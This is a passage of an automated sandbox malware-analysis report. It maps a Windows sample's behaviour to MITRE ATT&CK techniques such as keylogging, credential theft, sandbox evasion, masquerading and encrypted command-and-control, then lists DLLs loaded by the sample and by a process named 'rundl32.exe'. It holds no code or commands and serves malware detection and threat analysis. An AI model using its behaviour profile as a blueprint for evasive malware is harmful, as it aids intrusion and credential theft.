"Masquerade Task or Service", "attck_id": "T1036.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 29}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 4}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 8, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Dead Drop Resolver", "attck_id": "T1102.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Web Service", "attck_id": "T1567", "attck_id_wiki": "https://attack.mitre.org/techniques/T1567", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"VERSION.DLL\" at base 74e90000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORWKS.DLL\" at base 65240000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"USER32.DLL\" at base 776c0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"MSCOREE.DLL\" at base 6c3b0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"NTDLL\" at base 77af0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"ADVAPI32.DLL\" at base 76060000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"KERNEL32.DLL\" at base 75f80000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76110000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"PROFAPI.DLL\" at base 75a10000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MSCORLIB\\9F895C66454577EFF9C77442D0C84F71\\MSCORLIB.NI.DLL\" at base 64740000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\OLE32.DLL\" at base 0\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"CRYPTBASE.DLL\" at base 75980000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744f0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORJIT.DLL\" at base 6aad0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM\\AD92DAB7F418877D6A1E0358CE35658A\\SYSTEM.NI.DLL\" at base 63f90000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\GAC_32\\MSCORLIB\\2.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"BCRYPT.DLL\" at base 75510000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\2.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"PROPSYS.DLL\" at base 74730000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"COMCTL32.DLL\" at base 748f0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"OLEAUT32.DLL\" at base 77510000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"CLBCATQ.DLL\" at base 75d30000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74730000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"NTMARTA.DLL\" at base 74e60000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"APPHELP.DLL\" at base 758a0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 70710000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 764c0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75f80000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"SETUPAPI.DLL\" at base 77370000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"RPCRT4.DLL\" at base 772c0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75a80000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 77170000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"SECUR32.DLL\" at base 75720000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75ac0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6fe40000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758a0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"SHFOLDER.DLL\" at base 72b70000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\VERSION.DLL\" at base 0\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\CULTURE.DLL\" at base 6cae0000\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\DIASYMREADER.DLL\" at base 6a5c0000\n \"rundl32.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72080000\n \"rundl32.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rundl32.exe\" loaded module \"KERNEL32\" at base 75f80000\n \"rundl32.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rundl32.exe\" loaded module \"ADVAPI32.DLL\" at base 76060000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6c320000\n \"rundl32.exe\" loaded module \"SHLWAPI.DLL\" at base 75f20000\n \"rundl32.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"rundl32.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"rundl32.exe\" loaded module \"VERSION.DLL\" at base 74e90000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 637e0000\n \"rundl32.exe\" loaded module \"USER32.DLL\" at base 776c0000\n \"rundl32.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"rundl32.exe\" loaded module \"MSCOREE.DLL\" at base 6c3b0000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"rundl32.exe\" loaded module \"PSAPI.DLL\" at base 775d0000\n \"rundl32.exe\" loaded module \"RPCRT4.DLL\" at base 772c0000\n \"rundl32.exe\" loaded module \"KERNEL32.DLL\" at base 75f80000\n \"rundl32.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 623d0000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"rundl32.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"rundl32.exe\" loaded module \"CRYPTBASE.DLL\" at base 75980000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744f0000\n \"rundl32.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6d0d0000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6a990000\n \"rundl32.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 61650000\n \"rundl32.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 60e30000\n \"rundl32.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.V9921E851#\\A891970B44DB9E340C3EF3EFA95B793C\\MICROSOFT.VISUALBASIC.NI.DLL\" at base 6a690000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6d080000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"rundl32.exe\" loaded module \"BCRYPT.DLL\" at base 75510000\n \"rundl32.exe\" loaded module \"CRYPTSP.DLL\" at base 75400000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75190000\n \"rundl32.exe\" loaded module \"SSPICLI.DLL\" at base 75880000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"rundl32.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 68be0000\n \"rundl32.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 606b0000\n \"rundl32.exe\" loaded module \"NTDLL.DLL\" at base 77af0000\n \"rundl32.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"rundl32.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76110000\n \"rundl32.exe\" loaded module \"PROFAPI.DLL\" at base 75a10000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\RASAPI32.DLL\" at base 0\n \"rundl32.exe\" loaded module \"RASAPI32.DLL\" at base 6c650000\n \"rundl32.exe\" loaded module \"RTUTILS.DLL\" at base 73c50000\n \"rundl32.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76110000\n \"rundl32.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 76110000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"rundl32.exe\" loaded module \"WS2_32.DLL\" at base 775e0000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 753c0000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74f20000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 753b0000\n \"rundl32.exe\" loaded module \"RASMAN.DLL\" at base 6c630000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WINHTTP.DLL\" at base 0\n \"rundl32.exe\" loaded module \"WINHTTP.DLL\" at base 71fe0000\n \"rundl32.exe\" loaded module \"CREDSSP.DLL\" at base 750c0000\n \"rundl32.exe\" loaded module \"IPHLPAPI.DLL\" at base 726e0000\n \"rundl32.exe\" loaded module \"DHCPCSVC6.DLL\" at base 71e40000\n \"rundl32.exe\" loaded module \"DHCPCSVC.DLL\" at base 71980000\n \"rundl32.exe\" loaded module \"NSI.DLL\" at base 77cd0000\n \"rundl32.exe\" loaded module \"CFGMGR32.DLL\" at base 75a50000\n \"rundl32.exe\" loaded module \"OLEAUT32.DLL\" at base 77510000\n \"rundl32.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76110000\n \"rundl32.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75990000\n \"rundl32.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76110000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"rundl32.exe\" loaded module \"DNSAPI.DLL\" at base 75280000\n \"rundl32.exe\" loaded module \"RASADHLP.DLL\" at base 6d1f0000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71a00000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\IPHLPAPI.DLL\" at base 0\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\SECUR32.DLL\" at base 0\n \"rundl32.exe\" loaded module \"SECUR32.DLL\" at base 75720000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 75200000\n \"rundl32.exe\" loaded module \"NCRYPT.DLL\" at base 75530000\n \"rundl32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 750d0000\n 